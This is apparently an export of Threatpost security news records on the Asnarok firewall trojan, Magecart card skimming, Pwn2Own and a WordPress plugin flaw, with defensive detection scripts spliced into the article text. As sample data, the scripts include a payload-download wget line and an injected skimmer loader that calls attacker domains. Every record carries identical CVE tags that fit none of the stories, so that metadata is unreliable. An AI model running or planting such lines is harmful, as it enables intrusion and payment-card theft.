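    "/usr/bin/b", "/tmp/Info.xg",
]
SAMPLE_LOG = [
    "2020-04-23T02:11:09 proto=tcp src=10.0.0.5 dst=mirror.example.net dport=443",
    "2020-04-23T02:11:12 proto=tcp src=10.0.0.5 dst=sophosfirewallupdate.com dport=443",
    "2020-04-23T05:14:40 proto=tcp src=10.0.0.5 dst=43.229.55.44 dport=443",
]
# A constructed OS script with a download line appended after its real content.
SAMPLE_SCRIPT = "#!/bin/sh\nstart_service\nwget -q -O /tmp/b http://sophosproductupdate.com/lp\n"

if __name__ == "__main__":
    print("dropped files:", hunt_files(SAMPLE_LISTING))
    for line, ioc in hunt_connections(SAMPLE_LOG):
        print("C2 contact:", ioc, "|", line)
    print("script tampered:", script_references_c2(SAMPLE_SCRIPT))
```

Since the b binary deletes itself from disk, a file hunt alone can miss an active infection; the connection check and the appended-command check cover the stages that persist.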
If successful, it then downloads another Linux ELF executable called Sophos.dat.\n\nThe second of the dropped shell scripts is written to the /tmp directory with the filename .pg.sh. It goes on to download a second, different ELF executable, called bk on the web server, which is written to the filesystem with the name .post_MI.\n\nThe initial Install.sh script also runs a number of PostgreSQL commands to modify or zero out the values of certain tables in the database, Sophos noted. One of these commands modifies a specific service value entry so that .post_MI executes whenever that service is executed.\n\n\u201cThe Install.sh script\u2026modified at least one shell script that is part of the firewall\u2019s operating system to add a set of commands to the end of the script,\u201d according to the writeup. \u201cThis last script, in particular, is relevant because the malware modified services to ensure it ran every time the firewall booted up; it served as a roundabout persistence mechanism for the malware.\u201d\n\n## **Asnarok Trojan: Stealing XG Firewall Data**\n\nThe file called Sophos.dat, saved to the filesystem as 2own, is the ultimate payload in the kill chain \u2013 the Asnarok trojan, first detailed in the Sophos analysis this weekend.\n\n\u201cThis malware\u2019s primary task appeared to be data theft, which it could perform by retrieving the contents of various database tables stored in the firewall, as well as by running some operating system commands,\u201d according to Sophos research.\n\nAsnarok first retrieves the public-facing IP address where the firewall is installed, using public IP-lookup services like \u201cifconfig.me\u201d and \u201ccheckip.dyndns.org.\u201d Next, it retrieves information about the firewall and its users from different storage areas on the firewall.\n\nSophos said that this data includes: the firewall\u2019s license and serial number; a list of the email addresses of user accounts that were stored on the device; the primary 
email belonging to the firewall\u2019s administrator account; firewall users\u2019 names, usernames, encrypted passwords and the salted SHA256 hash of the administrator account\u2019s password; a list of the user IDs permitted to use the firewall for SSL VPN; and a list of accounts permitted to use a \u201cclientless\u201d VPN connection.\n\nThe malware also gathered data on the appliance itself: the version of the operating system; the type of CPU and amount of memory present on the device; how long it has been operational since the last reboot (the \u2018uptime\u2019); and the output of ifconfig and the ARP table, Sophos said.\n\nThe data is collected into a temporary file on the firewall with the name Info.xg, compressed, encrypted with OpenSSL and then earmarked for upload to the IP address 38.27.99.69. In a final step, Asnarok deletes the files that it temporarily created while it collected the information.\n\nThe firm said that it hasn\u2019t seen evidence that the collected data was successfully exfiltrated from victimized systems. Threatpost has reached out for more information on the number of targeted systems and any other information about the scope of the attack.\n\nUsers who don\u2019t have automatic updates enabled on their firewalls [can enable them](<https://community.sophos.com/kb/en-us/135415>) in order to receive the hotfix. Sophos meanwhile said that it has blocked the domains and IP addresses associated with the campaign.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. [On May 13 at 2 p.m. ET](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>), join Valimail security experts and Threatpost for a FREE webinar, [5 Proven Strategies to Prevent Email Compromise](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>). 
Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please [register here ](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-04-27T16:16:14", "type": "threatpost", "title": "Hackers Mount Zero-Day Attacks on Sophos Firewalls", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-04-27T16:16:14", "id": "THREATPOST:66B6758B39EA6566B84928992AF3085C", "href": "https://threatpost.com/hackers-zero-day-attacks-sophos-firewalls/155169/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:27:19", "description": "The online store for the Rooster Teeth video-streaming service has been hit with a malicious web redirect attack by Magecart, which allowed the cybercriminals to harvest users\u2019 payment-card details. The attack marks a slight departure from the group\u2019s typical tactics.\n\nRooster Teeth, which offers original podcasts, animated shows and short-form content aimed at Millennials, gamers and geeks, said that the attack happened on December 2. According to a company website notice, it was able to detect the issue the same day.\n\n\u201cThe malicious code directed users entering a checkout on the site to a spoofed webpage where they were asked to enter payment-card details in order to complete their purchases,\u201d [the Rooster Teeth notice](<https://blog.roosterteeth.com/notice-of-data-breach/>) explained. \u201cThis was inserted after the stage at which users entered their shipping data. 
Users who completed the payment-card details page were then directed to the real webpage, where they were asked to complete the forms again.\u201d\n\n[Magecart](<https://threatpost.com/macys-data-breach-linked-to-magecart/150393/>) is an umbrella term encompassing several different threat groups who typically use the same modus operandi: They compromise websites (mainly built on the Magento e-commerce platform) in order to inject card-skimming scripts on checkout pages. But the Magecart crooks behind this attack mixed up their tactics for this incident, according to Elad Shapira, head of research at Panorays.\n\n\u201cThe recent Rooster Teeth data breach illustrates how the Magecart threat continues to evolve while often targeting organizations through their third parties,\u201d he said via email. \u201cIn this case, malicious code introduced on the company\u2019s Shopify-based online store directed users to a fake payment page, where they were asked to enter their credit-card information. But it also points to good news, which is that companies are clearly beginning to take this threat seriously. It\u2019s encouraging that Rooster Teeth\u2019s IT team was able to discover and remove the malicious code on the same day it was introduced. Organizations can learn from this example, and should be sure to put processes in place to manage and review susceptibility to the Magecart threat through third-parties.\u201d\n\nThe issue affected the Rooster Teeth online store, where the company offers various kinds of clothing and other merchandise. Rooster Teeth free streaming accounts and its \u201cFIRST\u201d subscription memberships weren\u2019t impacted, the company said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/12/17153707/rooster-teeth-e1576615039820.jpg>)The spoofed page collected name, email address, telephone number, physical address, and/or payment-card information (including expiration dates and security codes). 
The company said that it sent data-breach notices to customers who were caught up in the attack.\n\n\u201cWe removed the malicious code from the Site and took other steps to secure the site against further unauthorized access,\u201d the company said. \u201cThe incident did not affect any other part of the site or other information maintained by us. It is our goal to provide a safe and secure shopping environment, and we will continue to review, audit, and improve our security controls and processes.\u201d\n\nMike Bittner, director of digital security and operations at The Media Trust, noted that the attack underscores the ongoing rise of digital supply-chain attacks.\n\n\u201cUntil companies take the insecurity of their digital supply chains seriously and monitor the code that runs on their sites, these attacks will continue,\u201d he said. \u201cThere\u2019s no other way to prevent these attacks than to allow only trusted digital vendors to run code on your site, as well as closely watch and regulate all the code that these vendors and their own digital third parties run to make sure they all follow your policies. 
By doing so, you will address not only security risk but also quality and performance risks that can degrade the site\u2019s user experience.\u201d\n", "cvss3": {}, "published": "2019-12-17T20:51:21", "type": "threatpost", "title": "Rooster Teeth Attack Showcases New Magecart Approach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2019-12-17T20:51:21", "id": "THREATPOST:26D5939EFE0BD9FACA470F9A3D547398", "href": "https://threatpost.com/rooster-teeth-attack-magecart/151216/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:25:01", "description": "UPDATE\n\nA faction of the Magecart threat group, Magecart group 12, has been linked to a recent digital card skimmer attack bent on stealing payment data from a slew of websites, including ones selling anything from Olympic tickets to emergency preparation kits.\n\nOver the past few weeks, the group has targeted two ticket sales websites \u2013 one called [Olympic Tickets](<http://olympictickets2020.com>) is a re-seller of tickets to the upcoming 2020 summer Olympic games and the second, [Euro 2020 Tickets](<http://eurotickets2020.com>), is selling tickets for the 2020 UEFA, a European football championship that takes place in June. Researchers also found the group\u2019s same skimming code (being loaded from a different domain) used to target popular emergency preparedness sites; [BePrepared.com](<http://beprepared.com>), which sells survival kits and gear, and [Augason Farms](<http://augasonfarms.com>), which sells emergency food supplies.\n\n\u201cThese sites were compromised by a skimmer using the domain OpenDoorCDN.com for data exfiltration,\u201d said Jordan Herman, threat researcher with RiskIQ in a Friday analysis. 
\u201cResearch by RiskIQ turned up several other compromised sites \u2013 some ranked within the Alexa top-200,000 \u2013 loading skimming code from storefrontcdn.com.\u201d\n\nResearchers [Max Kersten](<https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/>) and [Jacob Pimental](<https://www.goggleheadedhacker.com/blog/post/14>) first became aware of the infection of the Olympic and UEFA ticket sale websites Jan. 17, after finding a web-skimming script on both of their check-out pages. While it\u2019s unclear how long the malicious script was on these two websites, the researchers estimate it may have been as long as 50 days, since the skimmer for both was first indexed Dec. 3, 2019. The skimmer has since been removed, they said. These sites were loading skimming code from the domain opendoorcdn.com.\n\nMeanwhile, the websites of both BePrepared.com and Augason Farms, which are owned by Blue Chip Group Manufacturing, were infected by the skimming code between Jan. 16 and Jan. 19, RiskIQ researchers said. The skimming code affecting these two sites was loaded from a different domain, storefrontcdn.com. These two sites have also since removed the code. Researchers said they don\u2019t have an indication of how many people were impacted by this wave of card-skimmer attacks; however, BePrepared.com is currently ranked by Alexa at 129,204 globally and 26,238 in the U.S. Augasonfarms.com meanwhile is ranked 100,908 globally and 17,793 in the U.S.\n\nBased on the skimming code and obfuscation techniques used, researchers were able to link this attack back to Magecart Group 12, one of several groups operating under the [Magecart umbrella](<https://threatpost.com/podcast-breaking-down-the-magecart-threat-part-two/139534/>). 
[Magecart](<https://threatpost.com/podcast-breaking-down-the-magecart-threat-part-two/139534/>), which has made headlines over the past year or so for high-profile breaches of companies like [VisionDirect](<https://threatpost.com/visiondirect-blindsided-by-magecart-in-data-breach/139223/>), [Ticketmaster](<https://threatpost.com/ticketmaster-breach-just-one-part-of-a-wide-ranging-campaign/133892/>) and more, is known for its use of web-based digital card skimmers. These are scripts injected into e-commerce websites, either directly or through compromised third-party suppliers used by those sites, to steal data entered into online payment forms.\n\nThe specific group in question, Magecart Group 12, has also been responsible for attacks on a [Paris-based advertising company, Adverline](<https://www.riskiq.com/blog/labs/magecart-adverline/>). This most recent campaign reused techniques from Group 12\u2019s previous skimming attacks, along with some new ones.\n\n## New Tactics\n\nIn previous campaigns, Group 12 used Base64-encoded checks against the URLs of websites, looking for words like \u201ccheckout\u201d to identify the payment page. That technique was dropped in this most recent campaign; instead, the script was loaded via a variable under the alias \u201cEventsListenerPool.\u201d Herman told Threatpost that while he\u2019s not certain why the group made the change, it may have been to avoid detection.\n\n\u201cWhat has changed is how [Magecart attackers] get the compromised page to load that obfuscated skimming script. Previously, we would see an obfuscated piece of code on the compromised page that checks the URL for the word \u2018checkout\u2019 before loading the skimmer,\u201d RiskIQ told Threatpost. 
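Because the loader on the compromised page is now a plain, unobfuscated snippet and the domain it points at gets swapped, a checkout-page audit is better keyed on what the page is allowed to load than on any one skimmer domain. The following Python is an added example, not RiskIQ's code, that lists the scripts a checkout page references and flags any external source outside an allowlist plus any inline script whose digest is not in a known-good baseline. The page HTML, the shop hostnames and the script paths are constructed; only the domains opendoorcdn.com and toplevelstatic.com come from the article.

```python
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._buf = None  # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf).strip())
            self._buf = None


def collect_scripts(html):
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.external, parser.inline


def inline_digest(body):
    """sha256 of an inline script body, in the sha256-<base64> form CSP uses."""
    return "sha256-" + base64.b64encode(hashlib.sha256(body.encode()).digest()).decode()


def inline_baseline(html):
    """Digests of the inline scripts found on a known-good copy of the page."""
    _, inline = collect_scripts(html)
    return {inline_digest(body) for body in inline}


def audit_scripts(html, page_host, allowed_hosts, baseline):
    """Return (kind, evidence) findings for scripts the page should not carry."""
    external, inline = collect_scripts(html)
    findings = []
    for src in external:
        host = urlsplit(src).hostname or page_host  # relative URL = same origin
        if host not in allowed_hosts:
            findings.append(("unexpected-host", src))
    for body in inline:
        digest = inline_digest(body)
        if digest not in baseline:
            findings.append(("unknown-inline", digest))
    return findings


# Constructed pages: a known-good checkout page, and the same page after a
# Group 12-style injection (a bare loader line plus a tag on a skimmer domain).
GOOD_PAGE = """<html><head>
<script src="/js/checkout.js"></script>
<script src="https://cdn.shop.example/lib/ui.js"></script>
<script>window.shop = {currency: "USD"};</script>
</head><body><form id="checkout"></form></body></html>"""

INJECTED = (
    '<script>var s=document.createElement("script");'
    's.src="https://toplevelstatic.com/js/tl.js";document.head.appendChild(s);</script>\n'
    '<script src="//opendoorcdn.com/cdn.js"></script>\n'
)
BAD_PAGE = GOOD_PAGE.replace("</head>", INJECTED + "</head>")

PAGE_HOST = "shop.example"
ALLOWED_HOSTS = {"shop.example", "cdn.shop.example"}

if __name__ == "__main__":
    baseline = inline_baseline(GOOD_PAGE)
    for kind, evidence in audit_scripts(BAD_PAGE, PAGE_HOST, ALLOWED_HOSTS, baseline):
        print(kind, evidence)
```

A static parse never sees the tag that the injected loader creates at runtime, which is why the inline baseline matters: the loader itself is caught as an unknown inline body even though toplevelstatic.com appears nowhere in the markup as a src. For a live site, feed the audit the rendered DOM as well as the served HTML, or enforce the same allowlist with a Content-Security-Policy script-src directive so the browser refuses the swapped-in domain outright.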
\u201cIn these recent compromises, there is no obfuscated code inserted on the compromised page and no URL check; instead, they opted for a simple, non-obfuscated bit of code on the compromised page which caused the above skimming script to load.\u201d\n\nAttackers in this most recent campaign also moved quickly to swap out the domains from which the skimming code was loaded. After researchers had identified OpenDoorCDN.com (registered since January 2019) on compromised websites, the domain was replaced by another, TopLevelStatic.com (registered Feb. 1 through a Chinese registrar), for instance.\n\n\u201cMagecart groups generally use many different domains for their skimmers and data exfiltration,\u201d RiskIQ told Threatpost. \u201cThis allows them to avoid detection because it is difficult to blacklist every one of their domains or get them taken down by their hosting providers. This is the first time I have directly observed a group swapping out skimming domains on compromised sites due to a takedown, but I expect it is not uncommon and shows how slippery Magecart can be.\u201d\n\nThese domains use the same DNS provider, DNSPod, based in China, researchers said, and both are hosted on NGINX servers and use Let\u2019s Encrypt certs. The IPs connected to TopLevelStatic.com have changed at least once a day, with each server, so far, based in Russia, they said. Skimming code is still being loaded from TopLevelStatic.com, Herman told Threatpost.\n\n\u201cThe activity seen here demonstrates that Magecart is a persistent and resilient threat that requires constant vigilance in order to protect against it,\u201d RiskIQ researchers said.\n\n_This article was updated at 12pm ET on Friday to clarify that the domain behind the skimming code on the Olympic ticket reseller websites was different than the one affecting the prepping sites. 
_\n\n_**Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us [Wednesday, Feb. 19 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>) when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives.**_\n", "cvss3": {}, "published": "2020-02-07T11:00:01", "type": "threatpost", "title": "Magecart Gang Attacks Olympic Ticket Reseller and Survival Food Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-02-07T11:00:01", "id": "THREATPOST:3F0E45B1EBB975331C1ED9FCA486E4BE", "href": "https://threatpost.com/olympic-ticket-survival-sites-hit-by-cyberattack/152648/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:22:32", "description": "Covid-19 has brought the world to a grinding halt, but for the [hacking competition Pwn2Own](<https://www.zerodayinitiative.com/blog/2020/3/17/welcome-to-pwn2own-2020-the-schedule-and-live-results>), that wasn\u2019t the case. The event, planned for CanSecWest this week in Vancouver, went virtual along with the conference itself. Faced with travel restrictions and new social-distancing guidelines, contestants virtually assembled via the teleconferencing platform Zoom from Africa, Singapore and across the Americas.\n\n\u201cWe were monitoring the situation. And if we weren\u2019t going to converge in Vancouver, our first priority was remote participation,\u201d said Dustin Childs, communications manager for Zero Day Initiative (ZDI), the event organizer. 
\u201cWe had to come up quickly with how to get everyone together in the right ways in the right rooms with the right access. It was tough, but we managed to do it.\u201d\n\nOver the course of two days, hacking teams including Fluoroacetate, RedRocket CTF and Synacktiv attempted to hack Adobe\u2019s Acrobat Reader, Apple\u2019s macOS and virtualization platforms such as Oracle VirtualBox. They competed for close to $300,000 in prizes \u2013 and for one talented hacking group, the bragging rights of Master of Pwn.\n\nTuning into the competition via Zoom, judges and technical teams coordinated with white-hat hackers who, in real time, were mostly successful in compromising the targeted devices and software.\n\nDuring one attempt, the Fluoroacetate team of Amat Cama and Richard Zhu targeted Adobe Reader and then Windows with a local privilege-escalation attack. Blink an eye and you might have missed the hack \u2013 in under five seconds and one mouse click, on their first attempt, team Fluoroacetate compromised Adobe Reader and used it to take control of the underlying operating system, Windows 10.\n\nMore specifically, the team chained two separate use-after-free bugs, one in Adobe Reader and one in the Windows kernel.\n\n\u201cThe only thing they did was open a PDF. So, that\u2019s something we all do every day. 
And, from that, they were able to escape the sandbox in Adobe Reader and escalate through the Windows kernel \u2013 taking over the entire machine just by opening a PDF,\u201d Childs said.\n\nFor the one-click hack, team Fluoroacetate earned $50,000.\n\nTensions were high on Wednesday when a team from Georgia Tech Systems Software and Security Lab pulled off a high-wire hack chaining six different vulnerabilities to successfully exploit Apple\u2019s Safari browser and execute code (launch the calculator app) on a computer running macOS.\n\nFor the Georgia Tech team, which consisted of Yong Hwi Jin ([@jinmo123](<https://twitter.com/jinmo123>)), Jungwon Lim ([@setuid0x0_](<https://twitter.com/setuid0x0_>)), and Insu Yun ([@insu_yun_en](<https://twitter.com/insu_yun_en>)), the hack earned $70,000.\n\nThings didn\u2019t go so well for the Synacktiv team of Corentin Bayet (@OnlyTheDuck) and Bruno Pujos (@BrunoPujos), who targeted VMware Workstation in the Virtualization category. Over the course of three attempts, three big sighs of disappointment punctuated the failed attacks. The hack eventually succeeded, but not within the contest\u2019s rules of three tries within timed sessions.\n\nVirtualized applications didn\u2019t fare as well against Phi Ph\u1ea1m H\u1ed3ng (@4nhdaden) of STAR Labs, who compromised Oracle\u2019s VirtualBox on his third try. Chaining an out-of-bounds read, an information-leak bug and an uninitialized-variable bug, H\u1ed3ng executed code on the VirtualBox hypervisor.\n\nFor his efforts, H\u1ed3ng\u2019s STAR Labs earned $40,000.\n\nThe title Master of Pwn was awarded to team Fluoroacetate for its stellar hacks during the event. 
With the title also comes $25,000, the classic Pwn2Own jerseys and of course the Master of Pwn trophy.\n\n\u201cIt ended up being a great contest under very stressful, trying circumstances,\u201d Childs said. \u201cBut it was great that the vendors came together with the contestants and our team pulled it off. It was a great thing that we were able to still put it on.\u201d\n\nZDI has [posted the complete Pwn2Own results here](<https://www.zerodayinitiative.com/blog/2020/3/20/pwn2own-day-two-results-and-master-of-pwn>).\n", "cvss3": {}, "published": "2020-03-20T20:03:37", "type": "threatpost", "title": "Defying Covid-19\u2019s Pall: Pwn2Own Goes Virtual", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-03-20T20:03:37", "id": "THREATPOST:EDFFF959759E1951E67CA4BC4A8FAF1E", "href": "https://threatpost.com/defying-covid-19s-pall-pwn2own-goes-virtual/154002/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:24:20", "description": "Researchers are urging users of a vulnerable WordPress plugin, ThemeGrill Demo Importer, to update as soon as possible after discovering that attackers are actively exploiting a flaw in the plugin.\n\nThe [ThemeGrill Demo Importer](<https://wordpress.org/plugins/themegrill-demo-importer/>) plugin is owned by ThemeGrill, which offers WordPress themes. The plugin helps users import and manage ThemeGrill templates on their sites. As of [last week,](<https://webcache.googleusercontent.com/search?q=cache:kTHL3xHA_oUJ:https://wordpress.org/plugins/themegrill-demo-importer/+&cd=1&hl=en&ct=clnk&gl=ee>) the plugin had 200,000 active installations. According to WebARX, [which discovered the flaw](<https://www.webarxsecurity.com/critical-issue-in-themegrill-demo-importer/>), by Tuesday that number had dipped to 100,000 installs. 
It is unclear at this time what accounts for the drop in the number of installs.\n\nResearchers disclosed a flaw in the plugin this week which allows unauthenticated, remote attackers to execute some administrator functions \u2013 without any check that they are an administrator. One such function is the capability to wipe the entire database of the vulnerable website, bringing it to its default state and clearing the site\u2019s database of existing posts and user roles. And, after carrying out this action, an attacker would also be logged in as an administrator \u2013 giving them complete control over the website.\n\n\u201cThis is a serious vulnerability and can cause a significant amount of damage,\u201d according to WebARX researchers in a post this week. \u201cSince it requires no suspicious-looking payload \u2026 it is not expected for any firewall to block this by default and a special rule needs to be created to block this vulnerability.\u201d\n\nVersions from 1.3.4 to 1.6.1 are impacted by this flaw. According to the [WordPress plugin repository](<https://wordpress.org/plugins/themegrill-demo-importer/advanced/>), versions 1.4, 1.5 and 1.6 make up 98.6 percent of active versions of the plugin. Researchers say that the issue has existed in the plugin\u2019s code for about three years (since version 1.3.4).\n\nResearchers discovered the vulnerability on Feb. 5 and reported it to ThemeGrill. On Sunday, ThemeGrill released the [patched version](<https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2245070%40themegrill-demo-importer%2Ftrunk&old=2190304%40themegrill-demo-importer%2Ftrunk&sfp_email=&sfph_mail=>) of the plugin, version 1.6.2. However, according to reports, active exploitation of the vulnerability has started, with some affected websites showing a WordPress \u201cHello World\u201d post. 
The \u201cHello World\u201d post is a \u201cdummy\u201d post that WordPress creates as placeholder content upon initial installation, so its reappearance on a production site is a sign that the database has been reset.\n\n> There's currently a severe vuln in a wordpress plugin called \"themegrill demo importer\" that resets the whole database. <https://t.co/tT4xiqjna5> It seems attacks are starting: Some of the affected webpages show a wordpress \"hello world\"-post. /cc [@webarx_security](<https://twitter.com/webarx_security?ref_src=twsrc%5Etfw>)\n> \n> \u2014 hanno (@hanno) [February 18, 2020](<https://twitter.com/hanno/status/1229716599227195393?ref_src=twsrc%5Etfw>)\n\nIn a message to Threatpost, WebARX confirmed that the vulnerability is being actively exploited in the wild, and said it has blocked over 16,000 attacks against this vulnerability since Feb. 16 (a list of IP addresses actively exploiting the flaw [can be found here](<https://www.webarxsecurity.com/critical-issue-in-themegrill-demo-importer/>)).\n\n## Flaw Technical Details\n\nResearchers said that the prerequisite for an exploit is that a theme published by ThemeGrill must be installed and activated on the affected website. And, in order for the attacker to be automatically logged in as an administrator, there must be a user called \u201cadmin\u201d in the website\u2019s database.\n\nOnce the plugin detects that a ThemeGrill theme is installed and activated, it loads a file (/includes/class-demo-importer.php) that registers a callback on the admin_init hook. A hook is WordPress\u2019s mechanism for letting one piece of code run when another reaches a given point; admin_init fires whenever an admin screen or script is being initialized.\n\nThe problem is that admin_init also fires for requests to /wp-admin/admin-ajax.php, an endpoint that does not require the user to be authenticated, so the plugin\u2019s callback runs for anonymous visitors too. 
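As an added practitioner's check, not WebARX's or ThemeGrill's code, the Node.js script below fingerprints the installed plugin version from the plugin's readme.txt and compares it with the affected range given above. It assumes the WordPress plugin-directory layout (wp-content/plugins/themegrill-demo-importer/readme.txt, with a "Stable tag:" header line) and that the file is web-readable on the target; the stable tag can lag the deployed version, so a hit is a lead to confirm from the Plugins screen or `wp plugin list`, not proof. The sample readme is constructed.

```javascript
// Added example: fingerprint the ThemeGrill Demo Importer version via its
// readme.txt and compare it against the affected range the report gives.
// Not the plugin's or WebARX's code; the readme path and its exposure are
// assumptions about the target site.
const PLUGIN_SLUG = "themegrill-demo-importer";
const VULN_FROM = "1.3.4"; // first affected version
const VULN_TO = "1.6.1";   // last affected version; 1.6.2 carries the fix

// Dotted version strings compared numerically field by field ("1.10" > "1.9").
function parseVersion(v) {
  return String(v).trim().split(".").map((n) => parseInt(n, 10) || 0);
}
function compareVersions(a, b) {
  const x = parseVersion(a);
  const y = parseVersion(b);
  for (let i = 0; i < Math.max(x.length, y.length); i++) {
    const d = (x[i] || 0) - (y[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  return 0;
}
function isVulnerableVersion(v) {
  return compareVersions(v, VULN_FROM) >= 0 && compareVersions(v, VULN_TO) <= 0;
}

// WordPress plugin readmes carry "Stable tag: x.y.z" in their header block.
// Returns the tag, or null when absent or non-numeric (e.g. "trunk").
function stableTagFromReadme(readme) {
  const m = /^\s*Stable tag:\s*([0-9][0-9.]*)\s*$/im.exec(readme);
  return m ? m[1] : null;
}

function readmeUrl(siteUrl) {
  return new URL(`/wp-content/plugins/${PLUGIN_SLUG}/readme.txt`, siteUrl).toString();
}

// Classify a site from its readme body (pure, so it can be exercised offline).
// readmeBody === null means the readme was not served (plugin likely absent).
function assess(siteUrl, readmeBody) {
  const version = readmeBody === null ? null : stableTagFromReadme(readmeBody);
  return {
    site: siteUrl,
    installed: readmeBody !== null,
    version,
    vulnerable: version === null ? null : isVulnerableVersion(version),
  };
}

// Network step (Node 18+ global fetch): a non-2xx answer is treated as "not present".
async function checkSite(siteUrl) {
  const res = await fetch(readmeUrl(siteUrl), { redirect: "follow" });
  return assess(siteUrl, res.ok ? await res.text() : null);
}

// Constructed sample readme in the plugin-directory header format.
const SAMPLE_README = [
  "=== ThemeGrill Demo Importer ===",
  "Contributors: themegrill",
  "Requires at least: 4.7",
  "Stable tag: 1.6.1",
  "License: GPLv3",
].join("\n");

if (typeof require !== "undefined" && require.main === module) {
  console.log(assess("https://shop.example", SAMPLE_README));
  if (process.argv[2]) checkSite(process.argv[2]).then(console.log);
}
```

Run it with a site URL as the first argument to fetch the live readme; with no argument it only evaluates the constructed sample. Because the range check is inclusive on both ends, 1.4, 1.5 and 1.6 (the 98.6 percent named above) all come back vulnerable, while 1.6.2 does not.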
This issue (which has occurred in other plugins before, including [WP Live Chat Support](<https://threatpost.com/wordpress-wp-live-chat-support-plugin-fixes-xss-flaw/144856/>) and [others](<https://threatpost.com/wordpress-plugins-malvertising-backdoor-campaign/147926/>)) means that an attacker could merely send a specially crafted request to the /wp-admin/admin-ajax.php endpoint and have the plugin carry out actions reserved for users with administrative permissions on the website.\n\n\u201cadmin_init is a hook that plugins can hook into,\u201d researchers told Threatpost. \u201cIt\u2019s executed on all admin screen/scripts. However, this also includes /wp-admin/admin-ajax.php which is also used for calls by unauthenticated users.\u201d\n\nOnce the reset is triggered, the plugin drops all WordPress tables that start with the configured database prefix and, if an \u201cadmin\u201d user exists, logs the attacker in as that user. This effectively resets the website to its default state and wipes all data in the database \u2013 including all user roles, posts and pages, and more, researchers told Threatpost.\n\nResearchers told Threatpost that the flaw doesn\u2019t yet have a CVE number or CVSS score. Threatpost has also reached out to ThemeGrill for further information but had not heard back by publication.\n\nIt\u2019s only the latest WordPress plugin to have a vulnerability. 
Last week, for instance, the [popular WordPress plugin](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>) GDPR Cookie Consent issued fixes for a critical flaw that, if exploited, could enable attackers to modify content or inject malicious JavaScript code into victim websites.\n", "cvss3": {}, "published": "2020-02-18T17:27:33", "type": "threatpost", "title": "Active Exploits Hit Vulnerable WordPress ThemeGrill Plugin", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-02-18T17:27:33", "id": "THREATPOST:137B556D777466139D73B0ECF97E4E32", "href": "https://threatpost.com/active-exploits-hit-vulnerable-wordpress-themegrill-plugin/152947/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:26:44", "description": "Blue Bear Software, an administration and e-commerce platform for K-12 schools and other educational institutions, is warning its customers that it has suffered a Magecart attack.\n\nBlue Bear\u2019s platform enables management of school accounting, student fees and online stores. 
In a letter to those affected ([obtained](<http://www.documentcloud.org/documents/6596719-Active-Network-Blue-Bear-Notice.html>) by Bleeping Computer), the vendor\u2019s parent company, Active Networks, said that anyone who had purchased items from a school webstore powered by its platform is potentially affected.\n\n[Magecart](<https://threatpost.com/macys-data-breach-linked-to-magecart/150393/>) is an umbrella term encompassing several different threat groups who typically use the same _modus operandi_: They compromise websites by exploiting vulnerabilities in third-party e-commerce platforms, in order to inject card-skimming scripts on checkout pages.\n\nAt Virus Bulletin last October, researchers at RiskIQ [said that](<https://threatpost.com/magecart-infestations-saturate-web/148911/>) Magecart is now so ubiquitous that its infrastructure is flooding the internet. There are at least 570 known command-and-control (C2) domains for the group, with close to 10,000 hosts actively loading those domains, researchers said.\n\n\u201cThis time, the attack targeted an educational accounting software platform that parents use to pay for student fees, books and school supplies,\u201d Elad Shapira, head of research at Panorays, said in an emailed statement. \u201cOnline retailers like Blue Bear are prime targets for Magecart, because data is easily stolen during checkout, often through third parties, as customers enter their credit cards.\u201d\n\nIn this case, the card-skimmers were present on websites using Blue Bear from Oct. 1 to Nov. 13 and collected names, payment-card numbers, expiration dates and CVV codes, and Blue Bear user IDs and passwords. 
